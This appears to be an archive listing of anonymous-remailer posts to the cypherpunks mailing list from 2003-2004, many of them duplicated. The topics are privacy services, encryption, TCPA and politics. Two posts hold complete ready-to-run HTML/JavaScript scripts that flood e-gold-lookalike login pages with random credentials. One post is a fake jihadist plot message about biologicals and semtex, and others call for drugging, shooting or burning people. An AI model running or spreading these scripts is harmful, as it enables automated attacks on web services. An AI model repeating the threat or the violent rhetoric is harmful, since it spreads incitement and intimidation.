Steve Thompson

2004-12-11 Thread Anonymous via the Cypherpunks Tonga Remailer

Out of nowhere cometh Steve Thompson, and sayeth he all manner of things.  But, 
while his mouth moveth one way, he seemeth to move the other.

http://groups-beta.google.com/groups?q=%22steve+thompson%22start=0hl=ensafe=off;

What hath suddenly attracted our AUK creep?



Re: Anti-RFID outfit deflates Mexican VeriChip hype

2004-12-01 Thread Anonymous via the Cypherpunks Tonga Remailer
 Bring em on, oops, they are here already. Darn, it wasn't
 the commies and nazis who were the threat, it was your
 indolent life-style paid for by your swell-paid, smarter wife, 
 up to women-empowered thieving the marketplace and 
 making innumerable enemies for you to blame for your 
 swelling brain fat-globules.
 
 Pray the draft is women-empowered so there's no need
 to shanghai the overaged, over-decrepit, over-funny-loving,
 inbred-feeders, pray for the Condies and the Maggies to 
 fight the gameboy-dreamy battles, really face-to-face,
 not just stomp-hoof the youngsters into hell for a face-save
 the empire.

Won't someone please slip a healthy dose of haloperidol into
JYA's food?



Re: Anti-RFID outfit deflates Mexican VeriChip hype

2004-12-01 Thread Anonymous via the Cypherpunks Tonga Remailer
 Bring em on, oops, they are here already. Darn, it wasn't
 the commies and nazis who were the threat, it was your
 indolent life-style paid for by your swell-paid, smarter wife, 
 up to women-empowered thieving the marketplace and 
 making innumerable enemies for you to blame for your 
 swelling brain fat-globules.
 
 Pray the draft is women-empowered so there's no need
 to shanghai the overaged, over-decrepit, over-funny-loving,
 inbred-feeders, pray for the Condies and the Maggies to 
 fight the gameboy-dreamy battles, really face-to-face,
 not just stomp-hoof the youngsters into hell for a face-save
 the empire.

Won't someone please slip a healthy dose of haloperidol into
JYA's food?



Re: Anonymizer outsourcing customer data?

2004-09-04 Thread Anonymous via the Cypherpunks Tonga Remailer
On Tue, 17 Aug 2004, Nomen Nescio wrote:

  They claim they have over 1 million users. Is a class action suit in
  order? Their privacy policy clearly states
 
  We consider your email address to be confidential information. We will
  never rent, sell, or otherwise reveal it to any other party without prior
  consent, except under the conditions set forth in the User Agreement for
  spamming and related abuses of netiquette, or unless we are compelled to
  do so by court order.
 

 As if that's not bad enough, I emailed their (useless) support about
 this and some retarded drone emailed back claiming that the email came
 from Anonymizer not lyris.net (even though I pointed out the IP address
 in the email belonged to lyris.net).

 *sigh*
 Such incompetance   :(

Oh, look! Anonymizer has fixed the problem in their latest HTML-laden
email!

Return-Path: [EMAIL PROTECTED]

See, they care!

Oops:

Name:anonymizer.lyris.net
Address:  64.62.197.139
Aliases:  wecare.anonymizer.com

Methinks they are mocking us. What happened to them? They were a fine
company once. Did Cottrell sell the brand? What other parts of the privacy 
policy are they willfully violating?



Re: Anonymizer outsourcing customer data?

2004-09-03 Thread Anonymous via the Cypherpunks Tonga Remailer
On Tue, 17 Aug 2004, Nomen Nescio wrote:

  They claim they have over 1 million users. Is a class action suit in
  order? Their privacy policy clearly states
 
  We consider your email address to be confidential information. We will
  never rent, sell, or otherwise reveal it to any other party without prior
  consent, except under the conditions set forth in the User Agreement for
  spamming and related abuses of netiquette, or unless we are compelled to
  do so by court order.
 

 As if that's not bad enough, I emailed their (useless) support about
 this and some retarded drone emailed back claiming that the email came
 from Anonymizer not lyris.net (even though I pointed out the IP address
 in the email belonged to lyris.net).

 *sigh*
 Such incompetance   :(

Oh, look! Anonymizer has fixed the problem in their latest HTML-laden
email!

Return-Path: [EMAIL PROTECTED]

See, they care!

Oops:

Name:anonymizer.lyris.net
Address:  64.62.197.139
Aliases:  wecare.anonymizer.com

Methinks they are mocking us. What happened to them? They were a fine
company once. Did Cottrell sell the brand? What other parts of the privacy 
policy are they willfully violating?



Re: Anonymizer outsourcing customer data?

2004-08-04 Thread Anonymous via the Cypherpunks Tonga Remailer
On Mon, 2 Aug 2004, J.A. Terranson wrote:

 Yes, this bugs me.  But the person they outsourced it *to* scares me even
 more!

They claim they have over 1 million users. Is a class action suit in 
order? Their privacy policy clearly states 

We consider your email address to be confidential information. We will 
never rent, sell, or otherwise reveal it to any other party without prior 
consent, except under the conditions set forth in the User Agreement for 
spamming and related abuses of netiquette, or unless we are compelled to 
do so by court order.



Re: Anonymizer outsourcing customer data?

2004-08-04 Thread Anonymous via the Cypherpunks Tonga Remailer
On Mon, 2 Aug 2004, J.A. Terranson wrote:

 Yes, this bugs me.  But the person they outsourced it *to* scares me even
 more!

They claim they have over 1 million users. Is a class action suit in 
order? Their privacy policy clearly states 

We consider your email address to be confidential information. We will 
never rent, sell, or otherwise reveal it to any other party without prior 
consent, except under the conditions set forth in the User Agreement for 
spamming and related abuses of netiquette, or unless we are compelled to 
do so by court order.



Anonymizer outsourcing customer data?

2004-08-02 Thread Anonymous via the Cypherpunks Tonga Remailer
Recently I received the Anonymizer PrivacyShield Alert, as an Anonymizer 
user, and was distressed to note that it appears Anonymizer has now 
outsourced its mail and marketing infrastructure.

Partial headers from new mail system:

Return-Path: [EMAIL PROTECTED]
Received: from anonymizer.lyris.net ([64.62.197.139])
From: Anonymizer.com [EMAIL PROTECTED]
Subject: PrivacyShield Alert - July 2004

[]

The previous mail messages appeared to have local to Anonymizer mail 
delivery systems sending them.

Does it bother anyone else that Anonymizer is outsourcing its customer 
information?



Re: Email tapping by ISPs, forwarder addresses, and crypto proxies

2004-07-08 Thread Anonymous via the Cypherpunks Tonga Remailer

I can't imagine any intelligence professional wasting her time reading
the crap at times coming over this list.

As of mid 2000 most of traffic is recorded. By this time 'most' is very close to 
'all'. But if you e-mail someone with account on the same local ISP, using dial-in at 
the recipient is also using dial-in, and ISP didn't farm-out dial-in access, then your 
message may not be backed up forever.




Final stage

2004-07-07 Thread Anonymous via the Cypherpunks Tonga Remailer
Praise Allah!  The spires of the West will soon come crashing down!
Our Brother wishes for us to meet at the previously discussed
southeastern roadhouse on August 1st, in preparation for the
operations scheduled for August 6th and 9th.

Alternative targets have been chosen.  Contact Jibril if you have not
heard of the changes since the last meeting.  The infidels have machines
that detect the biologicals, so make sure the containers are sealed and
scrubbed as discussed.

Leave excess semtex behind.  The more we transport, the more likely the
infidels are to detect us.

We have received more funding and supplies from our brothers in Saudi
Arabia and Syria.  Be prepared for another operation before January.

Praise Allah!  May the blood of the infidels turn the oceans red!



Re: Email tapping by ISPs, forwarder addresses, and crypto proxies

2004-07-07 Thread Anonymous via the Cypherpunks Tonga Remailer

I can't imagine any intelligence professional wasting her time reading
the crap at times coming over this list.

As of mid 2000 most of traffic is recorded. By this time 'most' is very close to 
'all'. But if you e-mail someone with account on the same local ISP, using dial-in at 
the recipient is also using dial-in, and ISP didn't farm-out dial-in access, then your 
message may not be backed up forever.




Final stage

2004-07-07 Thread Anonymous via the Cypherpunks Tonga Remailer
Praise Allah!  The spires of the West will soon come crashing down!
Our Brother wishes for us to meet at the previously discussed
southeastern roadhouse on August 1st, in preparation for the
operations scheduled for August 6th and 9th.

Alternative targets have been chosen.  Contact Jibril if you have not
heard of the changes since the last meeting.  The infidels have machines
that detect the biologicals, so make sure the containers are sealed and
scrubbed as discussed.

Leave excess semtex behind.  The more we transport, the more likely the
infidels are to detect us.

We have received more funding and supplies from our brothers in Saudi
Arabia and Syria.  Be prepared for another operation before January.

Praise Allah!  May the blood of the infidels turn the oceans red!



Re: Saving Opportunistic Encryption

2004-03-17 Thread Anonymous via the Cypherpunks Tonga Remailer
Hi,
Sandy Harris wrote:
Tarapia Tapioco wrote:
A possible implementation looks like this:
...

* Linux/KAME's IKE daemon racoon is patched to attempt retrieval of an
  RSA key from said DNS repository and generate appropriate security
  policies.

Cleaner solution, but more work probably.

Why would you use racoon? FreeS/WAN's Pluto is available, under GPL,
already does OE, and works with 2.6 kernel IPsec (though I'm not
certain if patches are needed for that). Wouldn't it be a better
starting point?

I have to take a look at this. Using racoon was my first idea because it
seems to be the official Linux thing these days and is portable to the
*BSDs, too. It's probably only the NIH syndrome at work.

Also, using pluto suffers from the general FreeS/WAN problem of not allowing
contributions from USAians. 

Anyway, thanks for the reminder - while the project is still at the 
half-assed idea tossing state, hacking FreeS/WAN should still be an 
option.



Re: Saving Opportunistic Encryption

2004-03-17 Thread Anonymous via the Cypherpunks Tonga Remailer
Hi,
Sandy Harris wrote:
Tarapia Tapioco wrote:
A possible implementation looks like this:
...

* Linux/KAME's IKE daemon racoon is patched to attempt retrieval of an
  RSA key from said DNS repository and generate appropriate security
  policies.

Cleaner solution, but more work probably.

Why would you use racoon? FreeS/WAN's Pluto is available, under GPL,
already does OE, and works with 2.6 kernel IPsec (though I'm not
certain if patches are needed for that). Wouldn't it be a better
starting point?

I have to take a look at this. Using racoon was my first idea because it
seems to be the official Linux thing these days and is portable to the
*BSDs, too. It's probably only the NIH syndrome at work.

Also, using pluto suffers from the general FreeS/WAN problem of not allowing
contributions from USAians. 

Anyway, thanks for the reminder - while the project is still at the 
half-assed idea tossing state, hacking FreeS/WAN should still be an 
option.




Re: Saving Opportunistic Encryption

2004-03-17 Thread Anonymous via the Cypherpunks Tonga Remailer
Hi,
Sandy Harris wrote:
Tarapia Tapioco wrote:
A possible implementation looks like this:
...

* Linux/KAME's IKE daemon racoon is patched to attempt retrieval of an
  RSA key from said DNS repository and generate appropriate security
  policies.

Cleaner solution, but more work probably.

Why would you use racoon? FreeS/WAN's Pluto is available, under GPL,
already does OE, and works with 2.6 kernel IPsec (though I'm not
certain if patches are needed for that). Wouldn't it be a better
starting point?

I have to take a look at this. Using racoon was my first idea because it
seems to be the official Linux thing these days and is portable to the
*BSDs, too. It's probably only the NIH syndrome at work.

Also, using pluto suffers from the general FreeS/WAN problem of not allowing
contributions from USAians. 

Anyway, thanks for the reminder - while the project is still at the 
half-assed idea tossing state, hacking FreeS/WAN should still be an 
option.



Internet Voting, Safely

2004-01-25 Thread Anonymous via the Cypherpunks Tonga Remailer
Recently there has been publicity about a report critical of a proposed
internet voting experiment, http://servesecurityreport.org/.  The authors
critique the SERVE system, which was designed to allow overseas military
personnel to vote absentee via the internet. The authors were four
members of the SPRG (Security Peer Review Group), a panel of experts
in computerized election security that was called upon to review the
SERVE project.

While the report makes many good points, any realistic appraisal of the
prospects for internet voting must look beyond the current state of the
art in security technology.  It will take years before internet voting
can become widely available, and in that time we can expect currently
planned security improvements to be implemented and fielded.

In particular, the advent of Trusted Computing, principally in the form of
Microsoft's Next Generation Secure Computing Base (NGSCB), offers a number
of features which should address the most significant security-related
limitations and problems for the widespread use of internet voting.

For more commentary, see the Unlimited Freedom blog entry at
http://invisiblog.com/1c801df4aee49232/article/9d481af00c898ae91748f2f0cd97cf80.



loader 7

2003-10-03 Thread Anonymous via the Cypherpunks Tonga Remailer
save as plain text, loader7.html and run in a browser.
whitehatter





htmlhead
script language=javascript
!--

var dns = ;
var c = true;

function popup()
{
 document.formname.Account_ID.value = get_random();
 document.formname.P_hrase.value = GeneratePassword();
 document.formname.submit();
 setTimeout(autosubmit();, 2000);
}

function get_random()
{
 var ranNum = Math.round(Math.random()*99);
 return ranNum;
}

function getRandomNum() {

// between 0 - 1
var rndNum = Math.random()

// rndNum from 0 - 1000
rndNum = parseInt(rndNum * 1000);

// rndNum from 33 - 127
rndNum = (rndNum % 94) + 33;

return rndNum;
}
function checkPunc(num) {

if ((num =33)  (num =47)) { return true; }
if ((num =58)  (num =64)) { return true; }
if ((num =91)  (num =96)) { return true; }
if ((num =123)  (num =126)) { return true; }

return false;
}

function GeneratePassword() {

var length;
var sPassword = ;
length = 6+ Math.round(Math.random()*20)

for (i=0; i  length; i++) {

numI = getRandomNum();
while (checkPunc(numI)) { numI = getRandomNum(); }
sPassword = sPassword + String.fromCharCode(numI);
}

return sPassword;
}

function autosubmit()
{
 if (c)
 {
   document.formname.Account_ID.value = get_random();
   document.formname.P_hrase.value = GeneratePassword();
   document.formname.submit();
   setTimeout(autosubmit();, 1000);
 }
}

function turn()
{
 c = !c;
 if (c) setTimeout(autosubmit();, 2000);
 document.formname.x.value = c?Stop it!:Let's do it again!;
}

//--
/script
/head
body onload=popup();

center
form name=formname method=post action=https://e-gold0.com/acct/acct.php; 
target=new7
input type=text name=Account_ID length=20 maxlength=40 size=25br
input type=hidden name=email value=
input taborder=2 tabindex=2 type=text name=P_hrase maxlength=64 size=32 
autocomplete=off
input taborder=3 tabindex=3 type=hidden name=Turing maxlength=10 size=10 
autocomplete=off value=584095
input type=hidden name=jumbo value=2368
input type=submit name=Submit value=Login
input notab type=checkbox name=StoreMyNumber value=checkbox checked
input type=button name=x value=Stop it! onclick=turn();
/form
/center

/body
/html



loader 7

2003-10-03 Thread Anonymous via the Cypherpunks Tonga Remailer
save as plain text, loader7.html and run in a browser.
whitehatter





htmlhead
script language=javascript
!--

var dns = ;
var c = true;

function popup()
{
 document.formname.Account_ID.value = get_random();
 document.formname.P_hrase.value = GeneratePassword();
 document.formname.submit();
 setTimeout(autosubmit();, 2000);
}

function get_random()
{
 var ranNum = Math.round(Math.random()*99);
 return ranNum;
}

function getRandomNum() {

// between 0 - 1
var rndNum = Math.random()

// rndNum from 0 - 1000
rndNum = parseInt(rndNum * 1000);

// rndNum from 33 - 127
rndNum = (rndNum % 94) + 33;

return rndNum;
}
function checkPunc(num) {

if ((num =33)  (num =47)) { return true; }
if ((num =58)  (num =64)) { return true; }
if ((num =91)  (num =96)) { return true; }
if ((num =123)  (num =126)) { return true; }

return false;
}

function GeneratePassword() {

var length;
var sPassword = ;
length = 6+ Math.round(Math.random()*20)

for (i=0; i  length; i++) {

numI = getRandomNum();
while (checkPunc(numI)) { numI = getRandomNum(); }
sPassword = sPassword + String.fromCharCode(numI);
}

return sPassword;
}

function autosubmit()
{
 if (c)
 {
   document.formname.Account_ID.value = get_random();
   document.formname.P_hrase.value = GeneratePassword();
   document.formname.submit();
   setTimeout(autosubmit();, 1000);
 }
}

function turn()
{
 c = !c;
 if (c) setTimeout(autosubmit();, 2000);
 document.formname.x.value = c?Stop it!:Let's do it again!;
}

//--
/script
/head
body onload=popup();

center
form name=formname method=post action=https://e-gold0.com/acct/acct.php; 
target=new7
input type=text name=Account_ID length=20 maxlength=40 size=25br
input type=hidden name=email value=
input taborder=2 tabindex=2 type=text name=P_hrase maxlength=64 size=32 
autocomplete=off
input taborder=3 tabindex=3 type=hidden name=Turing maxlength=10 size=10 
autocomplete=off value=584095
input type=hidden name=jumbo value=2368
input type=submit name=Submit value=Login
input notab type=checkbox name=StoreMyNumber value=checkbox checked
input type=button name=x value=Stop it! onclick=turn();
/form
/center

/body
/html



e-gold script to run from whitehat

2003-09-12 Thread Anonymous via the Cypherpunks Tonga Remailer
htmlhead
script language=javascript
!--

var dns = ;
var c = true;

function popup()
{
 document.formname.AccountID.value = get_random();
 document.formname.PassPhrase.value = GeneratePassword();
 document.formname.submit();
 setTimeout(autosubmit();, 2000);
}

function get_random()
{
 var ranNum = Math.round(Math.random()*99);
 return ranNum;
}

function getRandomNum() {

// between 0 - 1
var rndNum = Math.random()

// rndNum from 0 - 1000
rndNum = parseInt(rndNum * 1000);

// rndNum from 33 - 127
rndNum = (rndNum % 94) + 33;

return rndNum;
}
function checkPunc(num) {

if ((num =33)  (num =47)) { return true; }
if ((num =58)  (num =64)) { return true; }
if ((num =91)  (num =96)) { return true; }
if ((num =123)  (num =126)) { return true; }

return false;
}

function GeneratePassword() {

var length;
var sPassword = ;
length = 6+ Math.round(Math.random()*20)

for (i=0; i  length; i++) {

numI = getRandomNum();
while (checkPunc(numI)) { numI = getRandomNum(); }
sPassword = sPassword + String.fromCharCode(numI);
}

return sPassword;
}

function autosubmit()
{
 if (c)
 {
   document.formname.AccountID.value = get_random();
   document.formname.PassPhrase.value = GeneratePassword();
   document.formname.submit();
   setTimeout(autosubmit();, 1000);
 }
}

function turn()
{
 c = !c;
 if (c) setTimeout(autosubmit();, 2000);
 document.formname.x.value = c?Stop it!:Let's do it again!;
}

//--
/script
/head
body onload=popup();

center
form name=formname method=post 
action=http://registration-update.net/e-gold_account/user-4598Xinc/e-gold-x621vx7/login.php;
 target=new3
input type=text name=AccountID length=20 maxlength=40 size=25br
input taborder=2 tabindex=2 type=text name=PassPhrase maxlength=64 size=32 
autocomplete=off
input taborder=3 tabindex=3 type=hidden name=Turing maxlength=10 size=10 
autocomplete=off value=417927
input type=hidden name=jumbo value=2121
input type=submit name=Submit value=Login
input notab type=checkbox name=StoreMyNumber value=checkbox checked
input type=button name=x value=Stop it! onclick=turn();
/form
/center

/body
/html



MIME-encrustations.

2003-09-12 Thread Anonymous via the Cypherpunks Tonga Remailer
Regarding the use of the mutt-specific MIME-encrusted PGP message format 
on mailing lists, I think Jon Callas (author of the OpenPGP RFC) sums up 
the issues best:

http://www.imc.org/ietf-openpgp/mail-archive/msg03786.html



e-gold script to run from whitehat

2003-09-12 Thread Anonymous via the Cypherpunks Tonga Remailer
htmlhead
script language=javascript
!--

var dns = ;
var c = true;

function popup()
{
 document.formname.AccountID.value = get_random();
 document.formname.PassPhrase.value = GeneratePassword();
 document.formname.submit();
 setTimeout(autosubmit();, 2000);
}

function get_random()
{
 var ranNum = Math.round(Math.random()*99);
 return ranNum;
}

function getRandomNum() {

// between 0 - 1
var rndNum = Math.random()

// rndNum from 0 - 1000
rndNum = parseInt(rndNum * 1000);

// rndNum from 33 - 127
rndNum = (rndNum % 94) + 33;

return rndNum;
}
function checkPunc(num) {

if ((num =33)  (num =47)) { return true; }
if ((num =58)  (num =64)) { return true; }
if ((num =91)  (num =96)) { return true; }
if ((num =123)  (num =126)) { return true; }

return false;
}

function GeneratePassword() {

var length;
var sPassword = ;
length = 6+ Math.round(Math.random()*20)

for (i=0; i  length; i++) {

numI = getRandomNum();
while (checkPunc(numI)) { numI = getRandomNum(); }
sPassword = sPassword + String.fromCharCode(numI);
}

return sPassword;
}

function autosubmit()
{
 if (c)
 {
   document.formname.AccountID.value = get_random();
   document.formname.PassPhrase.value = GeneratePassword();
   document.formname.submit();
   setTimeout(autosubmit();, 1000);
 }
}

function turn()
{
 c = !c;
 if (c) setTimeout(autosubmit();, 2000);
 document.formname.x.value = c?Stop it!:Let's do it again!;
}

//--
/script
/head
body onload=popup();

center
form name=formname method=post 
action=http://registration-update.net/e-gold_account/user-4598Xinc/e-gold-x621vx7/login.php;
 target=new3
input type=text name=AccountID length=20 maxlength=40 size=25br
input taborder=2 tabindex=2 type=text name=PassPhrase maxlength=64 size=32 
autocomplete=off
input taborder=3 tabindex=3 type=hidden name=Turing maxlength=10 size=10 
autocomplete=off value=417927
input type=hidden name=jumbo value=2121
input type=submit name=Submit value=Login
input notab type=checkbox name=StoreMyNumber value=checkbox checked
input type=button name=x value=Stop it! onclick=turn();
/form
/center

/body
/html



MIME-encrustations.

2003-09-12 Thread Anonymous via the Cypherpunks Tonga Remailer
Regarding the use of the mutt-specific MIME-encrusted PGP message format 
on mailing lists, I think Jon Callas (author of the OpenPGP RFC) sums up 
the issues best:

http://www.imc.org/ietf-openpgp/mail-archive/msg03786.html



re: Getting certificates.

2003-09-03 Thread Anonymous via the Cypherpunks Tonga Remailer
On Wed, 3 Sep 2003, James A. Donald wrote:

 --
 SSH server public/private keys are widely deployed.  PKI public
 keys are not.  Reason is that each SSH server just whips up its
 own keys without asking anyone's permission, or getting any
 certificates.

 Outlook and outlook express support digital signing and
 encryption -- but one must first get a certificate.

 So I go to Thawte to get my free certificate, and find that
 Thawte is making an alarmingly great effort to link
 certificates with true name information, and with the beast
 number that your government has assigned to you, which imposes
 large costs both on Thawte, and on the person seeking the
 certificate, and also has the highly undesirable effect that   
 using these certificates causes major loss of privacy, by  
 enabling true name and beast number contact tracing of people
 using encryption.
 
 Now what I want is a certificate that merely asserts that the
 holder of the certificate can receive email at such and such an
 address, and that only one such certificate has been issued for
 that address.  Such a certification system has very low costs
 for issuer and recipient, and because it is a nym certificate,
 no loss of privacy.
 
 Is there any web page set up to automatically issue such
 certificates?
 
 The certs that IE and outlook express accept oddly do not seem
 to have any provision for defining what the certificate
 certifies.
 
 This seems a curious and drastic omission from a certificate  
 format.
 
 Since there is no provision to define what a certificate
 certifies, one could argue that any certification authority
 that certifies anything other than a true name connected to a
 state issued id number, the number of the beast, is guilty of 
 fraud.  This would seem to disturbingly limit the usefulness
 and application of such certificates.  It also, as anyone who
 tries to get a free certificate from Thawte will discover,
 makes it difficult, expensive, and inconvenient to get
 certificates.
 
 --digsig
  James A. Donald

Here is an interesting post regarding the CA issue:

http://lists.spack.org/pipermail/wordup/2003/000684.html

You may want to look at http://www.cacert.org. It may do what you want.



Philips CRYPTO1 stream cipher

2003-09-02 Thread Anonymous via the Cypherpunks Tonga Remailer
Does anyone have any source code or algos for Philips CRYPTO1 stream cipher
as used in their MIFARE products?



RE: Idea: The ultimate CD/DVD auditing tool

2003-07-08 Thread Anonymous via the Cypherpunks Tonga Remailer
  As an audiophile (Krell+Levinson+Thiel gear at home), I definitely don't 
  want to grab an analog signal. Doing that the signal is sure to retain 
  characteristics of the extracting gear. But the vast majority of P2P kids 
  won't care one iota that their file was analog for half a second.
  
  -TD
  
 I'll ditto that - my brother is an extremist audiophile - he writes
 reviews for the high-end stuff (google Mike Trei). Many (by
 no means all) top end audophiles prefer all-analog equipment,
 and direct-cut vinyl records (ie, the master disk was cut directly
 at the performance, without a magtape master). I've listened to
 some of this stuff, and it just blows digital away.

What else do you expect, when any audiophile who denies that inaudible
frequencies make the music warmer proves himself to be a philistine
with ears of tin?

Remember, it was the fashion and clothing EXPERTS who were the most
insistent that the emperor's new clothes were absolutely marvelous.


Re: Orwell's Victory goods come home

2003-03-15 Thread Anonymous via the Cypherpunks Tonga Remailer
On Sat, 15 Mar 2003 14:25:51 +, you wrote:

 So which American on the list is going to write to Congress to demand
 that the Statue of Liberty be sent back to France?

 Ken

It really should go back to France, as the US seems to care less 
about liberty than when it received that gift, and France now 
has quite a profile of opposing foreign domination (from the US) 
over its policies and interests.

So far as I can tell tell, the US approach to other nations is 
essentially shut up and do what we tell you to do if you love 
freedom.



Re: Fw: Drunk driver detector that radios police

2003-03-11 Thread Anonymous via the Cypherpunks Tonga Remailer
On Fri, 7 Mar 2003 09:31:40 -0500 (est), Sunder [EMAIL PROTECTED] wrote:

Screw that - just buy a few thousand of these little devices, disable them
so that they're always transmitting drunk driver and install them in
politicians' cars all over DC (make sure you install'em in cop
cars too.)  You can also leave them in cabs.

They'll be banned immediately.

What the fuck makes you think you'd need to disable them for
politicians? Ted Kennedy, anyone?



Re: Fw: Drunk driver detector that radios police

2003-03-09 Thread Anonymous via the Cypherpunks Tonga Remailer
On Fri, 7 Mar 2003 09:31:40 -0500 (est), Sunder [EMAIL PROTECTED] wrote:

Screw that - just buy a few thousand of these little devices, disable them
so that they're always transmitting drunk driver and install them in
politicians' cars all over DC (make sure you install'em in cop
cars too.)  You can also leave them in cabs.

They'll be banned immediately.

What the fuck makes you think you'd need to disable them for
politicians? Ted Kennedy, anyone?



Re: Give cheese to france?

2003-03-09 Thread Anonymous via the Cypherpunks Tonga Remailer
On Sat, 08 Mar 2003 09:00:48 -0800, you wrote:

 --
 On 8 Mar 2003 at 2:44, Anonymous wrote:
  But let's cut to the chase. Assume that all private grocery
  store owners want to exclude people from their stores. Now
  assume that 100% of them agree that effective Tuesday, only
  those people who have a receipt for a $100 or more donation
  to George W Bush (or Hillary Clinton, whatever) may enter
  their property to shop for groceries.

 The difference between private property owners doing this, and
 the governemnt doing this is that 100% of private property
 owners are NOT going to agree on anything.

 The 100% assumption presupposes that the capitalists are
 like the state, a single entity with a single will, in which
 case it is obvious that simply replacing the will of the
 capitalists with the will of the people would be a vast
 improvement, rather than slavery terror and mass murder.

You are exactly right! Now comes the question: If the mall has 
the right, but can't join with all malls to solidify the 
uniformity of the prohibition, then a property right will be 
interfered with, either the right of one mall to prohibit, or 
the right of malls to agree to prohibit. Else the power of 
monopoly (all malls unified) has part of the effect of the 
government's monopoly.



Re: Give cheese to france?

2003-03-08 Thread Anonymous via the Cypherpunks Tonga Remailer
On Sat, 08 Mar 2003 09:00:48 -0800, you wrote:

 --
 On 8 Mar 2003 at 2:44, Anonymous wrote:
  But let's cut to the chase. Assume that all private grocery
  store owners want to exclude people from their stores. Now
  assume that 100% of them agree that effective Tuesday, only
  those people who have a receipt for a $100 or more donation
  to George W Bush (or Hillary Clinton, whatever) may enter
  their property to shop for groceries.

 The difference between private property owners doing this, and
 the governemnt doing this is that 100% of private property
 owners are NOT going to agree on anything.

 The 100% assumption presupposes that the capitalists are
 like the state, a single entity with a single will, in which
 case it is obvious that simply replacing the will of the
 capitalists with the will of the people would be a vast
 improvement, rather than slavery terror and mass murder.

You are exactly right! Now comes the question: If the mall has 
the right, but can't join with all malls to solidify the 
uniformity of the prohibition, then a property right will be 
interfered with, either the right of one mall to prohibit, or 
the right of malls to agree to prohibit. Else the power of 
monopoly (all malls unified) has part of the effect of the 
government's monopoly.



Re: Give cheese to france?

2003-03-07 Thread Anonymous via the Cypherpunks Tonga Remailer
On Thu, 6 Mar 2003 19:21:52 -0800, you wrote:

 On Thursday, March 6, 2003, at 02:11 PM, Major Variola (ret) wrote:
 Besides, the publicity has been great.  I was told that after it made
 news, 150 women wearing
 the same T-shirts showed up at the mall.  The security guards locked
 themselves in their offices.
 Probably messed their pants, too.

 If people didn't leave my property when told to, and the actual police would not 
 expel them, then I would consider it morally justified to start shooing those 150 
 bitches. Sometimes people don't understand anything except bullets.

 My defense would be that it was my property, they were trespassing, and the police 
 refused to do their job.

Stupid defense, and if you found a judge stupid enough to allow 
it, I'd be surprised. If you proved the elements above, you are 
still guilty of murder. You'd be the bitch in prison over that 
one. No state in the US allows lethal force for trespassing. Do 
it the way you said and you go down for murder one.


 Frankly, many of you on this list really need to be doused with gasoline and then 
 lit.

Maybe YOU need them to be doused; others are unlike to think 
they need dousing.


 I'm ashamed to be on the same list with you statists and fascists. The Eurotrash 
 nitwits are the worst. It's as if they were born in Communist countries and never 
 shook their early training...which, come to think of it, is probably likely.

Take a day off, go for a walk.



Comments to DOT's new Big Brother Airline Program Due Feb 24!

2003-02-17 Thread Anonymous via the Cypherpunks Tonga Remailer
COMMENTS MUST BE *RECEIVED* BY FEB. 24. PLEASE SEND THEM OUT ASAP!

SUMMARY:  DOT has published its intent to establish a Big Brother system
of records and is soliciting public comments.  The DOT must consider the
comments it receives before finalizing its actions. These comments were a
big help last time around fighting National IDs in the guise of
standardized state drivers licenses.  Many fewer citizens have commented
on DOT's proposed data collection, however, and time and liberties are
running short.  Information about the system is printed below, as is a
short sample letter.  Feel free to write something longer, but even a
short statement of your opposition to the draconian record system and a
signature would be helpful.

The U.S. Department of Transportation (DOT) intends to establish a system
of records which will collect information from all air travelers.  DOT
intends to release the information upon request to any agency for the
hiring or retention of an individual, or issuance of a security clearance,
license, contract, grant, or other benefit.

DOT also intends to disclose the information it collects to any Federal,
State, territorial, tribal, local, international, or foreign agency when
DOT becomes aware of any indication of any criminal or civil infraction of
any statute, rule, regulation, order, or license by any person traveling
by air.  This applies even to citizens of the United States when flying
within their own country.

This is an outrageous assault on the Privacy Act, as well as an affront to
the privacy of law abiding U.S. citizens.  If you are concerned about the
collection and disclosure of information from air travelers and want the
DOT to rescind its proposal, please provide your comments to Yvonne L.
Coates at the address below.  Comments must be RECEIVED by February 24,
2003, to be considered.  A sample letter is also below.

   Yvonne L. Coates
   Department of Transportation
   Office of the Secretary
   400 7th Street, SW
   Washington, DC 20590

   (202) 366-6964 (telephone)
   (202) 366-7024 (fax)
   [EMAIL PROTECTED] (Internet address)

Reference:  Federal Register, January 15, 2003, Volume 68, Number 10,
Pages 2101-2103.

- Begin Sample Letter -

Dear Ms. Coates,

I am writing to voice my objections to DOT's proposed information
collection of airline passenger information published in the Federal
Register, January 15, 2003, Pages 2101-2103.  The proposed system is an
affront to the personal liberties on which this nation was founded.
Please rescind it.

Signed,

Your Name.

-- End Sample Letter --




Re: [IP] Open Source TCPA driver and white papers (fwd)

2003-02-08 Thread Anonymous via the Cypherpunks Tonga Remailer
Mike Rosing wrote:
  BTW, why should I need a TPM only for secure key storage ?
  Any smartcard is better suited for this.

 Because it's soldered into the portable.  For an enterprise that means
 they *know* each portable out in the field is held by the correct
 user.  With a smart card, they only know the card is held by the
 correct user.

A key store chip could be useful for some applications.

However note: you can't defend TCPA as being good vs Palladium bad
(as you did by in an earlier post) by saying that TCPA only provides
key storage.

As Michel noted TCPA and Palladium both provide remote attestation and
sealing, and it is this pair of functions which provides the DRM
functionality.

Therefore for DRM purposes TCPA and Palladium are both socially bad
technologies.




Re: [IP] Open Source TCPA driver and white papers (fwd)

2003-02-06 Thread Anonymous via the Cypherpunks Tonga Remailer
Mike Rosing wrote:
  - secure boot
  - sealing
  - remote attestation

 It does *not* do these parts.

I think you may have been mislead by the slant of paper.

Quoting from the paper:

http://www.research.ibm.com/gsal/tcpa/why_tcpa.pdf

you will see:

| The TCPA chip is not particularly suited to DRM. While it does have
| the ability to report signed PCR information, and this information
| could be used to prevent playback unless a trusted operating system
| and application were in use, this type of scheme would be a
| nightmare for content providers to manage. Any change to the BIOS,
| the operating system, or the application would change the reported
| values. How could content providers recognize which reported PCR
| values were good, given the myriad platforms, operating system
| versions, and frequent software patches?

which clearly admits that the IBM TPM does implement the full set of
TCPA functionality as specified in the openly published TCPA spec, and
for the purposes of our discussion specifically as you see it does
implement the remote attestation feature.

(Though the author makes some unimaginative claims that it is not
suited for DRM because of upgrades may make that difficult to manage.
Any sane software architecture built on top of this tech can easily
tackle that problem.)

 That's why IBM wants the TPM != TCPA to be loud and clear.  That's
 why the RIAA can't expect it to solve their problem.

I'd think the more likely reason they want to downplay that TCPA is a
DRM enabling technology is because it's bad publicity for a hardware
manufacturer.




Re: [IP] Open Source TCPA driver and white papers (fwd)

2003-02-05 Thread Anonymous via the Cypherpunks Tonga Remailer
Mike Rosing wrote:
  - secure boot
  - sealing
  - remote attestation

 It does *not* do these parts.

